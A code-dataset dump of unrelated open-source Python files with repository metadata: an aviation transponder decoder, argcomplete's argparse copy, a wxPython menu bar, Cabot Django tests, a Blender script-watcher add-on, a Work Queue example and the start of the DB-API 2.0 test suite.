subprocess.Popen(cmd, shell=True)
if __name__ == '__main__':
main()
|
haldean/longtroll
|
longtroll/longtroll.py
|
Python
|
mit
| 3,588 | 0.015886 |
"""
Decode all-call reply messages, with downlink format 11
"""
from pyModeS import common
def _checkdf(func):
"""Ensure downlink format is 11."""
def wrapper(msg):
df = common.df(msg)
if df != 11:
raise RuntimeError(
"Incorrect downlink format, expect 11, got {}".format(df)
)
return func(msg)
return wrapper
@_checkdf
def icao(msg):
"""Decode transponder code (ICAO address).
Args:
msg (str): 14 hexdigits string
Returns:
string: ICAO address
"""
return common.icao(msg)
@_checkdf
def interrogator(msg):
"""Decode interrogator identifier code.
Args:
msg (str): 14 hexdigits string
Returns:
int: interrogator identifier code
"""
# the CRC remainder contains the CL and IC field. top three bits are CL field and last four bits are IC field.
remainder = common.crc(msg)
if remainder > 79:
IC = "corrupt IC"
elif remainder < 16:
IC="II"+str(remainder)
else:
IC="SI"+str(remainder-16)
return IC
@_checkdf
def capability(msg):
"""Decode transponder capability.
Args:
msg (str): 14 hexdigits string
Returns:
int, str: transponder capability, description
"""
msgbin = common.hex2bin(msg)
ca = common.bin2int(msgbin[5:8])
if ca == 0:
text = "level 1 transponder"
elif ca == 4:
text = "level 2 transponder, ability to set CA to 7, on ground"
elif ca == 5:
text = "level 2 transponder, ability to set CA to 7, airborne"
elif ca == 6:
text = "evel 2 transponder, ability to set CA to 7, either airborne or ground"
elif ca == 7:
text = "Downlink Request value is 0,or the Flight Status is 2, 3, 4 or 5, either airborne or on the ground"
else:
text = None
return ca, text
|
junzis/pyModeS
|
pyModeS/decoder/allcall.py
|
Python
|
gpl-3.0
| 1,888 | 0.003178 |
# Copyright 2012-2013, Andrey Kislyuk and argcomplete contributors.
# Licensed under the Apache License. See https://github.com/kislyuk/argcomplete for more info.
from argparse import ArgumentParser, ArgumentError, SUPPRESS, _SubParsersAction
from argparse import OPTIONAL, ZERO_OR_MORE, ONE_OR_MORE, REMAINDER, PARSER
from argparse import _get_action_name, _
_num_consumed_args = {}
def action_is_satisfied(action):
''' Returns False if the parse would raise an error if no more arguments are given to this action, True otherwise.
'''
num_consumed_args = _num_consumed_args.get(action, 0)
if action.nargs in [OPTIONAL, ZERO_OR_MORE, REMAINDER]:
return True
if action.nargs == ONE_OR_MORE:
return num_consumed_args >= 1
if action.nargs == PARSER:
# Not sure what this should be, but this previously always returned False
# so at least this won't break anything that wasn't already broken.
return False
if action.nargs is None:
return num_consumed_args == 1
assert isinstance(action.nargs, int), 'failed to handle a possible nargs value: %r' % action.nargs
return num_consumed_args == action.nargs
def action_is_open(action):
''' Returns True if action could consume more arguments (i.e., its pattern is open).
'''
num_consumed_args = _num_consumed_args.get(action, 0)
if action.nargs in [ZERO_OR_MORE, ONE_OR_MORE, PARSER, REMAINDER]:
return True
if action.nargs == OPTIONAL or action.nargs is None:
return num_consumed_args == 0
assert isinstance(action.nargs, int), 'failed to handle a possible nargs value: %r' % action.nargs
return num_consumed_args < action.nargs
def action_is_greedy(action, isoptional=False):
''' Returns True if action will necessarily consume the next argument.
isoptional indicates whether the argument is an optional (starts with -).
'''
num_consumed_args = _num_consumed_args.get(action, 0)
if action.option_strings:
if not isoptional and not action_is_satisfied(action):
return True
return action.nargs == REMAINDER
else:
return action.nargs == REMAINDER and num_consumed_args >= 1
class IntrospectiveArgumentParser(ArgumentParser):
''' The following is a verbatim copy of ArgumentParser._parse_known_args (Python 2.7.3),
except for the lines that contain the string "Added by argcomplete".
'''
def _parse_known_args(self, arg_strings, namespace):
_num_consumed_args.clear() # Added by argcomplete
self._argcomplete_namespace = namespace
self.active_actions = [] # Added by argcomplete
# replace arg strings that are file references
if self.fromfile_prefix_chars is not None:
arg_strings = self._read_args_from_files(arg_strings)
# map all mutually exclusive arguments to the other arguments
# they can't occur with
action_conflicts = {}
self._action_conflicts = action_conflicts # Added by argcomplete
for mutex_group in self._mutually_exclusive_groups:
group_actions = mutex_group._group_actions
for i, mutex_action in enumerate(mutex_group._group_actions):
conflicts = action_conflicts.setdefault(mutex_action, [])
conflicts.extend(group_actions[:i])
conflicts.extend(group_actions[i + 1:])
# find all option indices, and determine the arg_string_pattern
# which has an 'O' if there is an option at an index,
# an 'A' if there is an argument, or a '-' if there is a '--'
option_string_indices = {}
arg_string_pattern_parts = []
arg_strings_iter = iter(arg_strings)
for i, arg_string in enumerate(arg_strings_iter):
# all args after -- are non-options
if arg_string == '--':
arg_string_pattern_parts.append('-')
for arg_string in arg_strings_iter:
arg_string_pattern_parts.append('A')
# otherwise, add the arg to the arg strings
# and note the index if it was an option
else:
option_tuple = self._parse_optional(arg_string)
if option_tuple is None:
pattern = 'A'
else:
option_string_indices[i] = option_tuple
pattern = 'O'
arg_string_pattern_parts.append(pattern)
# join the pieces together to form the pattern
arg_strings_pattern = ''.join(arg_string_pattern_parts)
# converts arg strings to the appropriate and then takes the action
seen_actions = set()
seen_non_default_actions = set()
self._seen_non_default_actions = seen_non_default_actions # Added by argcomplete
def take_action(action, argument_strings, option_string=None):
seen_actions.add(action)
argument_values = self._get_values(action, argument_strings)
# error if this argument is not allowed with other previously
# seen arguments, assuming that actions that use the default
# value don't really count as "present"
if argument_values is not action.default:
seen_non_default_actions.add(action)
for conflict_action in action_conflicts.get(action, []):
if conflict_action in seen_non_default_actions:
msg = _('not allowed with argument %s')
action_name = _get_action_name(conflict_action)
raise ArgumentError(action, msg % action_name)
# take the action if we didn't receive a SUPPRESS value
# (e.g. from a default)
if argument_values is not SUPPRESS \
or isinstance(action, _SubParsersAction):
try:
action(self, namespace, argument_values, option_string)
except:
# Begin added by argcomplete
# When a subparser action is taken and fails due to incomplete arguments, it does not merge the
# contents of its parsed namespace into the parent namespace. Do that here to allow completers to
# access the partially parsed arguments for the subparser.
if isinstance(action, _SubParsersAction):
subnamespace = action._name_parser_map[argument_values[0]]._argcomplete_namespace
for key, value in vars(subnamespace).items():
setattr(namespace, key, value)
# End added by argcomplete
raise
# function to convert arg_strings into an optional action
def consume_optional(start_index):
# get the optional identified at this index
option_tuple = option_string_indices[start_index]
action, option_string, explicit_arg = option_tuple
# identify additional optionals in the same arg string
# (e.g. -xyz is the same as -x -y -z if no args are required)
match_argument = self._match_argument
action_tuples = []
while True:
# if we found no optional action, skip it
if action is None:
extras.append(arg_strings[start_index])
return start_index + 1
# if there is an explicit argument, try to match the
# optional's string arguments to only this
if explicit_arg is not None:
arg_count = match_argument(action, 'A')
# if the action is a single-dash option and takes no
# arguments, try to parse more single-dash options out
# of the tail of the option string
chars = self.prefix_chars
if arg_count == 0 and option_string[1] not in chars:
action_tuples.append((action, [], option_string))
char = option_string[0]
option_string = char + explicit_arg[0]
new_explicit_arg = explicit_arg[1:] or None
optionals_map = self._option_string_actions
if option_string in optionals_map:
action = optionals_map[option_string]
explicit_arg = new_explicit_arg
else:
msg = _('ignored explicit argument %r')
raise ArgumentError(action, msg % explicit_arg)
# if the action expect exactly one argument, we've
# successfully matched the option; exit the loop
elif arg_count == 1:
stop = start_index + 1
args = [explicit_arg]
action_tuples.append((action, args, option_string))
break
# error if a double-dash option did not use the
# explicit argument
else:
msg = _('ignored explicit argument %r')
raise ArgumentError(action, msg % explicit_arg)
# if there is no explicit argument, try to match the
# optional's string arguments with the following strings
# if successful, exit the loop
else:
start = start_index + 1
selected_patterns = arg_strings_pattern[start:]
self.active_actions = [action] # Added by argcomplete
_num_consumed_args[action] = 0 # Added by argcomplete
arg_count = match_argument(action, selected_patterns)
stop = start + arg_count
args = arg_strings[start:stop]
# Begin added by argcomplete
# If the pattern is not open (e.g. no + at the end), remove the action from active actions (since
# it wouldn't be able to consume any more args)
_num_consumed_args[action] = len(args)
if not action_is_open(action):
self.active_actions.remove(action)
# End added by argcomplete
action_tuples.append((action, args, option_string))
break
# add the Optional to the list and return the index at which
# the Optional's string args stopped
assert action_tuples
for action, args, option_string in action_tuples:
take_action(action, args, option_string)
return stop
# the list of Positionals left to be parsed; this is modified
# by consume_positionals()
positionals = self._get_positional_actions()
# function to convert arg_strings into positional actions
def consume_positionals(start_index):
# match as many Positionals as possible
match_partial = self._match_arguments_partial
selected_pattern = arg_strings_pattern[start_index:]
arg_counts = match_partial(positionals, selected_pattern)
# slice off the appropriate arg strings for each Positional
# and add the Positional and its args to the list
for action, arg_count in zip(positionals, arg_counts): # Added by argcomplete
self.active_actions.append(action) # Added by argcomplete
for action, arg_count in zip(positionals, arg_counts):
args = arg_strings[start_index: start_index + arg_count]
start_index += arg_count
_num_consumed_args[action] = len(args) # Added by argcomplete
take_action(action, args)
# slice off the Positionals that we just parsed and return the
# index at which the Positionals' string args stopped
positionals[:] = positionals[len(arg_counts):]
return start_index
# consume Positionals and Optionals alternately, until we have
# passed the last option string
extras = []
start_index = 0
if option_string_indices:
max_option_string_index = max(option_string_indices)
else:
max_option_string_index = -1
while start_index <= max_option_string_index:
# consume any Positionals preceding the next option
next_option_string_index = min([
index
for index in option_string_indices
if index >= start_index])
if start_index != next_option_string_index:
positionals_end_index = consume_positionals(start_index)
# only try to parse the next optional if we didn't consume
# the option string during the positionals parsing
if positionals_end_index > start_index:
start_index = positionals_end_index
continue
else:
start_index = positionals_end_index
# if we consumed all the positionals we could and we're not
# at the index of an option string, there were extra arguments
if start_index not in option_string_indices:
strings = arg_strings[start_index:next_option_string_index]
extras.extend(strings)
start_index = next_option_string_index
# consume the next optional and any arguments for it
start_index = consume_optional(start_index)
# consume any positionals following the last Optional
stop_index = consume_positionals(start_index)
# if we didn't consume all the argument strings, there were extras
extras.extend(arg_strings[stop_index:])
# if we didn't use all the Positional objects, there were too few
# arg strings supplied.
if positionals:
self.active_actions.append(positionals[0]) # Added by argcomplete
self.error(_('too few arguments'))
# make sure all required actions were present
for action in self._actions:
if action.required:
if action not in seen_actions:
name = _get_action_name(action)
self.error(_('argument %s is required') % name)
# make sure all required groups had one option present
for group in self._mutually_exclusive_groups:
if group.required:
for action in group._group_actions:
if action in seen_non_default_actions:
break
# if no actions were used, report the error
else:
names = [_get_action_name(action)
for action in group._group_actions
if action.help is not SUPPRESS]
msg = _('one of the arguments %s is required')
self.error(msg % ' '.join(names))
# return the updated namespace and the extra arguments
return namespace, extras
|
catapult-project/catapult
|
third_party/gsutil/third_party/argcomplete/argcomplete/my_argparse.py
|
Python
|
bsd-3-clause
| 15,351 | 0.000912 |
import wx
from ui.custom_checkbox import CustomCheckBox
class CustomMenuBar(wx.Panel):
def __init__(self, parent, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.parent = parent
self.SetBackgroundColour(self.parent.GetBackgroundColour())
self.SetForegroundColour(self.parent.GetForegroundColour())
self.SetFont(self.parent.GetFont())
self.img_size = 12
self._dragPos = None
self.Bind(wx.EVT_MOTION, self.OnMouse)
gbSizer = wx.GridBagSizer()
self.txtTitle = wx.StaticText(self, wx.ID_ANY, u"Tera DPS ", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer.Add(self.txtTitle, wx.GBPosition(0, 0), wx.GBSpan(1, 1), wx.ALL, 5)
self.txtServer = wx.StaticText(self, wx.ID_ANY, u"", wx.DefaultPosition, wx.DefaultSize, 0)
gbSizer.Add(self.txtServer, wx.GBPosition(0, 1), wx.GBSpan(1, 1), wx.ALL | wx.ALIGN_CENTER_HORIZONTAL , 5)
self.btn_pin = CustomCheckBox(self, 'ui.pin', color_checked='#FF0000', color_hover='#1188FF')
self.btn_pin.Bind(wx.EVT_CHECKBOX, self.parent.TogglePin)
gbSizer.Add(self.btn_pin, wx.GBPosition(0, 2), wx.GBSpan(1, 1), wx.ALL, 6)
self.btn_config = CustomCheckBox(self, 'ui.settings', color_checked='#FF0000', color_hover='#1188FF')
self.btn_config.Bind(wx.EVT_CHECKBOX, self.parent.ToggleConfig)
gbSizer.Add(self.btn_config, wx.GBPosition(0, 3), wx.GBSpan(1, 1), wx.ALL, 6)
self.btn_close = CustomCheckBox(self, 'ui.close', color_hover='#1188FF')
self.btn_close.Bind(wx.EVT_CHECKBOX, self.parent.OnClose)
gbSizer.Add(self.btn_close, wx.GBPosition(0, 4), wx.GBSpan(1, 1), wx.ALL, 6)
self.line1 = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
gbSizer.Add(self.line1, wx.GBPosition(1, 0), wx.GBSpan(1, 5), wx.EXPAND | wx.ALL, 0)
gbSizer.AddGrowableCol(1)
self.SetSizer(gbSizer)
def OnMouse(self, event):
if not event.Dragging():
if self._dragPos:
self.ReleaseMouse()
x , y = self.parent.GetPosition()
self.parent.config.WriteInt('x', x)
self.parent.config.WriteInt('y', y)
self._dragPos = None
return
if not self._dragPos:
self.CaptureMouse()
self._dragPos = event.GetPosition()
else:
pos = event.GetPosition()
displacement = self._dragPos - pos
self.parent.SetPosition(self.parent.GetPosition() - displacement)
|
jeff-alves/Tera
|
ui/custom_menu_bar.py
|
Python
|
mit
| 2,593 | 0.00617 |
from urlparse import urlparse
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from cabot.cabotapp.models import Service
from cabot.metricsapp.models import MetricsSourceBase, ElasticsearchStatusCheck, GrafanaInstance, GrafanaPanel
class TestMetricsReviewChanges(TestCase):
def setUp(self):
self.user = User.objects.create_user('user', email='user@example.com', password='password')
self.source = MetricsSourceBase.objects.create(name='source')
self.grafana_instance = GrafanaInstance.objects.create(
name='test',
url='http://test.url',
api_key='88888'
)
self.grafana_panel = GrafanaPanel.objects.create(
panel_id=1,
panel_url='http://test.url/some-dashboard/1',
grafana_instance=self.grafana_instance
)
self.metrics_check = ElasticsearchStatusCheck.objects.create(
name='test',
created_by=self.user,
source=self.source,
check_type='<=',
warning_value=9.0,
high_alert_value=15.0,
retries=0,
time_range=30,
frequency=5,
queries='{}',
grafana_panel=self.grafana_panel,
runbook=''
)
self.base_check_data = {
'name': 'test',
'queries': '{}',
'active': True,
'auto_sync': True,
'check_type': '<=',
'warning_value': 9.0,
'high_alert_importance': Service.ERROR_STATUS,
'high_alert_value': 15.0,
'consecutive_failures': 1,
'time_range': 30,
'retries': 0,
'frequency': 5,
'ignore_final_data_point': True,
'on_empty_series': 'fill_zero',
'use_activity_counter': False,
'run_delay': 0,
'run_window': '',
'runbook': '',
}
def test_review_changes(self):
data = self.base_check_data.copy()
data['name'] = 'ultra cool test'
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
self.assertNotContains(response, "No changes were made.", status_code=200, msg_prefix=str(response))
self.assertNotContains(response, "errorlist", status_code=200, msg_prefix=str(response))
# DB should NOT be updated yet
self.metrics_check = ElasticsearchStatusCheck.objects.get(pk=self.metrics_check.pk)
self.assertEqual(self.metrics_check.name, 'test')
# now accept the changes by manually setting skip_review to True (which should be done in the response)
# (would ideally do this by using a browser's normal submit routine on the response,
# but I don't think we can do that with just django's standard testing functions.
# we at least scan the HTML for the skip_review input to make sure it got set to True)
self.assertContains(response,
'<input id="skip_review" name="skip_review" type="checkbox" checked="checked" />',
status_code=200)
data['skip_review'] = True
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
# verify that we ended up at the success url (/check/<pk>)
self.assertEqual(urlparse(response.url).path, reverse('check', kwargs={'pk': self.metrics_check.pk}))
# DB should be updated, verify the name changed
self.metrics_check = ElasticsearchStatusCheck.objects.get(pk=self.metrics_check.pk)
self.assertEqual(self.metrics_check.name, 'ultra cool test')
def test_review_changes_no_changes(self):
"""
check that if we submit the form with no changes, we still go through the review changes flow
"""
# no changes to the check
data = self.base_check_data.copy()
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
self.assertNotContains(response, "errorlist", status_code=200, msg_prefix=str(response))
self.assertContains(response, "No changes were made.", status_code=200, msg_prefix=str(response))
# submitting again (with skip_review=True) should take us back to the check page
data['skip_review'] = True
response = self.client.post(reverse('grafana-es-update', kwargs={'pk': self.metrics_check.pk}), data=data)
# verify that we ended up at the success url (/check/<pk>)
self.assertEqual(urlparse(response.url).path, reverse('check', kwargs={'pk': self.metrics_check.pk}))
|
Affirm/cabot
|
cabot/metricsapp/tests/test_views.py
|
Python
|
mit
| 4,754 | 0.004417 |
"""
script_watcher.py: Reload watched script upon changes.
Copyright (C) 2015 Isaac Weaver
Author: Isaac Weaver <wisaac407@gmail.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
bl_info = {
"name": "Script Watcher",
"author": "Isaac Weaver",
"version": (0, 5),
"blender": (2, 75, 0),
"location": "Properties > Scene > Script Watcher",
"description": "Reloads an external script on edits.",
"warning": "Still in beta stage.",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Development/Script_Watcher",
"tracker_url": "https://github.com/wisaac407/blender-script-watcher/issues/new",
"category": "Development",
}
import os, sys
import io
import traceback
import types
import bpy
from bpy.app.handlers import persistent
@persistent
def load_handler(dummy):
try:
if (bpy.context.scene.sw_settings.running and bpy.context.scene.sw_settings.auto_watch_on_startup):
bpy.ops.wm.sw_watch_end('EXEC_DEFAULT')
bpy.ops.wm.sw_watch_start('EXEC_DEFAULT')
else:
bpy.ops.wm.sw_watch_end('EXEC_DEFAULT')
except:
print("Exception on startup check!")
def add_scrollback(ctx, text, text_type):
for line in text:
bpy.ops.console.scrollback_append(ctx, text=line.replace('\t', ' '),
type=text_type)
class SplitIO(io.StringIO):
"""Feed the input stream into another stream."""
PREFIX = '[Script Watcher]: '
_can_prefix = True
def __init__(self, stream):
io.StringIO.__init__(self)
self.stream = stream
def write(self, s):
# Make sure we prefix our string before we do anything else with it.
if self._can_prefix:
s = self.PREFIX + s
# only add the prefix if the last stream ended with a newline.
self._can_prefix = s.endswith('\n')
# Make sure to call the super classes write method.
io.StringIO.write(self, s)
# When we are written to, we also write to the secondary stream.
self.stream.write(s)
# Define the script watching operator.
class WatchScriptOperator(bpy.types.Operator):
"""Watches the script for changes, reloads the script if any changes occur."""
bl_idname = "wm.sw_watch_start"
bl_label = "Watch Script"
_timer = None
_running = False
_times = None
filepath = None
def get_paths(self):
"""Find all the python paths surrounding the given filepath."""
dirname = os.path.dirname(self.filepath)
paths = []
filepaths = []
for root, dirs, files in os.walk(dirname, topdown=True):
if '__init__.py' in files:
paths.append(root)
for f in files:
filepaths.append(os.path.join(root, f))
else:
dirs[:] = [] # No __init__ so we stop walking this dir.
# If we just have one (non __init__) file then return just that file.
return paths, filepaths or [self.filepath]
def get_mod_name(self):
"""Return the module name and the root path of the givin python file path."""
dir, mod = os.path.split(self.filepath)
# Module is a package.
if mod == '__init__.py':
mod = os.path.basename(dir)
dir = os.path.dirname(dir)
# Module is a single file.
else:
mod = os.path.splitext(mod)[0]
return mod, dir
def remove_cached_mods(self):
"""Remove all the script modules from the system cache."""
paths, files = self.get_paths()
for mod_name, mod in list(sys.modules.items()):
if hasattr(mod, '__file__') and os.path.dirname(mod.__file__) in paths:
del sys.modules[mod_name]
def _reload_script_module(self):
print('Reloading script:', self.filepath)
self.remove_cached_mods()
try:
f = open(self.filepath)
paths, files = self.get_paths()
# Get the module name and the root module path.
mod_name, mod_root = self.get_mod_name()
# Create the module and setup the basic properties.
mod = types.ModuleType('__main__')
mod.__file__ = self.filepath
mod.__path__ = paths
mod.__package__ = mod_name
# Add the module to the system module cache.
sys.modules[mod_name] = mod
# Fianally, execute the module.
exec(compile(f.read(), self.filepath, 'exec'), mod.__dict__)
except IOError:
print('Could not open script file.')
except:
sys.stderr.write("There was an error when running the script:\n" + traceback.format_exc())
else:
f.close()
def reload_script(self, context):
"""Reload this script while printing the output to blenders python console."""
# Setup stdout and stderr.
stdout = SplitIO(sys.stdout)
stderr = SplitIO(sys.stderr)
sys.stdout = stdout
sys.stderr = stderr
# Run the script.
self._reload_script_module()
# Go back to the begining so we can read the streams.
stdout.seek(0)
stderr.seek(0)
# Don't use readlines because that leaves trailing new lines.
output = stdout.read().split('\n')
output_err = stderr.read().split('\n')
if self.use_py_console:
# Print the output to the consoles.
for area in context.screen.areas:
if area.type == "CONSOLE":
ctx = context.copy()
ctx.update({"area": area})
# Actually print the output.
if output:
add_scrollback(ctx, output, 'OUTPUT')
if output_err:
add_scrollback(ctx, output_err, 'ERROR')
# Cleanup
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
def modal(self, context, event):
if not context.scene.sw_settings.running:
self.cancel(context)
return {'CANCELLED'}
if context.scene.sw_settings.reload:
context.scene.sw_settings.reload = False
self.reload_script(context)
return {'PASS_THROUGH'}
if event.type == 'TIMER':
for path in self._times:
cur_time = os.stat(path).st_mtime
if cur_time != self._times[path]:
self._times[path] = cur_time
self.reload_script(context)
return {'PASS_THROUGH'}
def execute(self, context):
if context.scene.sw_settings.running:
return {'CANCELLED'}
# Grab the settings and store them as local variables.
self.filepath = bpy.path.abspath(context.scene.sw_settings.filepath)
self.use_py_console = context.scene.sw_settings.use_py_console
# If it's not a file, doesn't exist or permistion is denied we don't preceed.
if not os.path.isfile(self.filepath):
self.report({'ERROR'}, 'Unable to open script.')
return {'CANCELLED'}
# Setup the times dict to keep track of when all the files where last edited.
dirs, files = self.get_paths()
self._times = dict((path, os.stat(path).st_mtime) for path in files) # Where we store the times of all the paths.
self._times[files[0]] = 0 # We set one of the times to 0 so the script will be loaded on startup.
# Setup the event timer.
wm = context.window_manager
self._timer = wm.event_timer_add(0.1, context.window)
wm.modal_handler_add(self)
context.scene.sw_settings.running = True
return {'RUNNING_MODAL'}
def cancel(self, context):
wm = context.window_manager
wm.event_timer_remove(self._timer)
self.remove_cached_mods()
context.scene.sw_settings.running = False
class CancelScriptWatcher(bpy.types.Operator):
"""Stop watching the current script."""
bl_idname = "wm.sw_watch_end"
bl_label = "Stop Watching"
def execute(self, context):
# Setting the running flag to false will cause the modal to cancel itself.
context.scene.sw_settings.running = False
return {'FINISHED'}
class ReloadScriptWatcher(bpy.types.Operator):
"""Reload the current script."""
bl_idname = "wm.sw_reload"
bl_label = "Reload Script"
def execute(self, context):
# Setting the reload flag to true will cause the modal to cancel itself.
context.scene.sw_settings.reload = True
return {'FINISHED'}
# Create the UI for the operator. NEEDS FINISHING!!
class ScriptWatcherPanel(bpy.types.Panel):
"""UI for the script watcher."""
bl_label = "Script Watcher"
bl_idname = "SCENE_PT_script_watcher"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "scene"
def draw(self, context):
layout = self.layout
running = context.scene.sw_settings.running
col = layout.column()
col.prop(context.scene.sw_settings, 'filepath')
col.prop(context.scene.sw_settings, 'use_py_console')
col.prop(context.scene.sw_settings, 'auto_watch_on_startup')
col.operator('wm.sw_watch_start', icon='VISIBLE_IPO_ON')
col.enabled = not running
if running:
row = layout.row(align=True)
row.operator('wm.sw_watch_end', icon='CANCEL')
row.operator('wm.sw_reload', icon='FILE_REFRESH')
class ScriptWatcherSettings(bpy.types.PropertyGroup):
"""All the script watcher settings."""
running = bpy.props.BoolProperty(default=False)
reload = bpy.props.BoolProperty(default=False)
filepath = bpy.props.StringProperty(
name = 'Script',
description = 'Script file to watch for changes.',
subtype = 'FILE_PATH'
)
use_py_console = bpy.props.BoolProperty(
name = 'Use py console',
description = 'Use blenders built-in python console for program output (e.g. print statments and error messages)',
default = False
)
auto_watch_on_startup = bpy.props.BoolProperty(
name = 'Watch on startup',
description = 'Watch script automatically on new .blend load',
default = False
)
def register():
bpy.utils.register_class(WatchScriptOperator)
bpy.utils.register_class(ScriptWatcherPanel)
bpy.utils.register_class(CancelScriptWatcher)
bpy.utils.register_class(ReloadScriptWatcher)
bpy.utils.register_class(ScriptWatcherSettings)
bpy.types.Scene.sw_settings = \
bpy.props.PointerProperty(type=ScriptWatcherSettings)
bpy.app.handlers.load_post.append(load_handler)
def unregister():
bpy.utils.unregister_class(WatchScriptOperator)
bpy.utils.unregister_class(ScriptWatcherPanel)
bpy.utils.unregister_class(CancelScriptWatcher)
bpy.utils.unregister_class(ReloadScriptWatcher)
bpy.utils.unregister_class(ScriptWatcherSettings)
bpy.app.handlers.load_post.remove(load_handler)
del bpy.types.Scene.sw_settings
if __name__ == "__main__":
register()
|
kilbee/blender-script-watcher
|
script_watcher.py
|
Python
|
gpl-2.0
| 12,299 | 0.007887 |
#!/usr/bin/env python3
# copyright (C) 2021- The University of Notre Dame
# This software is distributed under the GNU General Public License.
# See the file COPYING for details.
# Example on how to execute python code with a Work Queue task.
# The class PythonTask allows users to execute python functions as Work Queue
# commands. Functions and their arguments are pickled to a file and executed
# utilizing a wrapper script to execut the function. the output of the executed
# function is then written to a file as an output file and read when neccesary
# allowing the user to get the result as a python variable during runtime and
# manipulated later.
# A PythonTask object is created as `p_task = PyTask.PyTask(func, args)` where
# `func` is the name of the function and args are the arguments needed to
# execute the function. PythonTask can be submitted to a queue as regular Work
# Queue functions, such as `q.submit(p_task)`.
#
# When a has completed, the resulting python value can be retrieved by calling
# the output method, such as: `x = t.output` where t is the task retuned by
# `t = q.wait()`.
#
# By default, the task will run assuming that the worker is executing inside an
# appropiate python environment. If this is not the case, an environment file
# can be specified with: `t.specify_environment("env.tar.gz")`, in which
# env.tar.gz is created with the conda-pack module, and has at least a python
# installation, the dill module, and the conda module.
#
# A minimal conda environment 'my-minimal-env.tar.gz' can be created with:
#
# conda create -y -p my-minimal-env python=3.8 dill conda
# conda install -y -p my-minimal-env -c conda-forge conda-pack
# conda install -y -p my-minimal-env pip and conda install other modules, etc.
# conda run -p my-minimal-env conda-pack
import work_queue as wq
def divide(dividend, divisor):
import math
return dividend/math.sqrt(divisor)
def main():
q = wq.WorkQueue(9123)
for i in range(1, 16):
p_task = wq.PythonTask(divide, 1, i**2)
# if python environment is missing at worker...
#p_task.specify_environment("env.tar.gz")
q.submit(p_task)
sum = 0
while not q.empty():
t = q.wait(5)
if t:
x = t.output
if isinstance(x, wq.PythonTaskNoResult):
print("Task {} failed and did not generate a result.".format(t.id))
else:
sum += x
print(sum)
if __name__ == '__main__':
main()
|
btovar/cctools
|
work_queue/src/bindings/python3/PythonTask_example.py
|
Python
|
gpl-2.0
| 2,499 | 0.002001 |
#!/usr/bin/env python
''' Python DB API 2.0 driver compliance unit test suite.
This software is Public Domain and may be used without restrictions.
"Now we have booze and barflies entering the discussion, plus rumours of
DBAs on drugs... and I won't tell you what flashes through my mind each
time I read the subject line with 'Anal Compliance' in it. All around
this is turning out to be a thoroughly unwholesome unit test."
-- Ian Bicking
'''
__rcs_id__ = '$Id: dbapi20.py,v 1.10 2003/10/09 03:14:14 zenzen Exp $'
__version__ = '$Revision: 1.10 $'[11:-2]
__author__ = 'Stuart Bishop <zen@shangri-la.dropbear.id.au>'
import unittest
import time
# $Log: dbapi20.py,v $
# Revision 1.10 2003/10/09 03:14:14 zenzen
# Add test for DB API 2.0 optional extension, where database exceptions
# are exposed as attributes on the Connection object.
#
# Revision 1.9 2003/08/13 01:16:36 zenzen
# Minor tweak from Stefan Fleiter
#
# Revision 1.8 2003/04/10 00:13:25 zenzen
# Changes, as per suggestions by M.-A. Lemburg
# - Add a table prefix, to ensure namespace collisions can always be avoided
#
# Revision 1.7 2003/02/26 23:33:37 zenzen
# Break out DDL into helper functions, as per request by David Rushby
#
# Revision 1.6 2003/02/21 03:04:33 zenzen
# Stuff from Henrik Ekelund:
# added test_None
# added test_nextset & hooks
#
# Revision 1.5 2003/02/17 22:08:43 zenzen
# Implement suggestions and code from Henrik Eklund - test that cursor.arraysize
# defaults to 1 & generic cursor.callproc test added
#
# Revision 1.4 2003/02/15 00:16:33 zenzen
# Changes, as per suggestions and bug reports by M.-A. Lemburg,
# Matthew T. Kromer, Federico Di Gregorio and Daniel Dittmar
# - Class renamed
# - Now a subclass of TestCase, to avoid requiring the driver stub
# to use multiple inheritance
# - Reversed the polarity of buggy test in test_description
# - Test exception heirarchy correctly
# - self.populate is now self._populate(), so if a driver stub
# overrides self.ddl1 this change propogates
# - VARCHAR columns now have a width, which will hopefully make the
# DDL even more portible (this will be reversed if it causes more problems)
# - cursor.rowcount being checked after various execute and fetchXXX methods
# - Check for fetchall and fetchmany returning empty lists after results
# are exhausted (already checking for empty lists if select retrieved
# nothing
# - Fix bugs in test_setoutputsize_basic and test_setinputsizes
#
class DatabaseAPI20Test(unittest.TestCase):
''' Test a database self.driver for DB API 2.0 compatibility.
This implementation tests Gadfly, but the TestCase
is structured so that other self.drivers can subclass this
test case to ensure compiliance with the DB-API. It is
expected that this TestCase may be expanded in the future
if ambiguities or edge conditions are discovered.
The 'Optional Extensions' are not yet being tested.
self.drivers should subclass this test, overriding setUp, tearDown,
self.driver, connect_args and connect_kw_args. Class specification
should be as follows:
import dbapi20
class mytest(dbapi20.DatabaseAPI20Test):
[...]
Don't 'import DatabaseAPI20Test from dbapi20', or you will
confuse the unit tester - just 'import dbapi20'.
'''
# The self.driver module. This should be the module where the 'connect'
# method is to be found
driver = None
connect_args = () # List of arguments to pass to connect
connect_kw_args = {} # Keyword arguments for connect
table_prefix = 'dbapi20test_' # If you need to specify a prefix for tables
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower' # Name of stored procedure to convert string->lowercase
